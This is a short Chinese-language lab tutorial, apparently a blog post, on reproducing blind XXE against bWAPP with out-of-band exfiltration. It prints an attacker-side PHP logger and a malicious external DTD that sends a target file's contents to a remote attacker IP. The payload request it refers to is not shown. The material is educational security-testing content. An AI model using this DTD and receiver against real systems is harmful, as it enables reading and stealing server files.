2019-11-19:无返回的盲型xxe,使用带外读取数据
文章资料来源于网络,仅供参考,学习使用
复现盲型xxe
实验环境:bwapp,xxe关,注释掉了返回值
准备读取的flag.txt文件为
通过利用服务器外带数据方法步骤
1,攻击机服务器新建两个文件,一个php文件,一个dtd文件
php用来接收数据,代码为:
<?php
$xxe = $_GET['xxe'];
$log = fopen('xxe.txt','a');
fwrite($log,$xxe.'\n');
fclose($log);
?>
dtd文件用来向php文件发起请求,文件里面的%;是html实体编码代码表示为%
<!ENTITY % xxe
"<!ENTITY % send SYSTEM 'http://192.168.190.150/test.php?xxe=%file;'>"
>
%xxe;
确定准备的两个文件,都是可以访问的
2,访问有xxe漏洞的页面,抓取数据包
3,发送如下数据包,虽然没有显示,但是可以到准备文件的服务器中,会建立有一个xxe.txt文件,写入了xxe传来的数据
数据已经写入到攻击机服务器中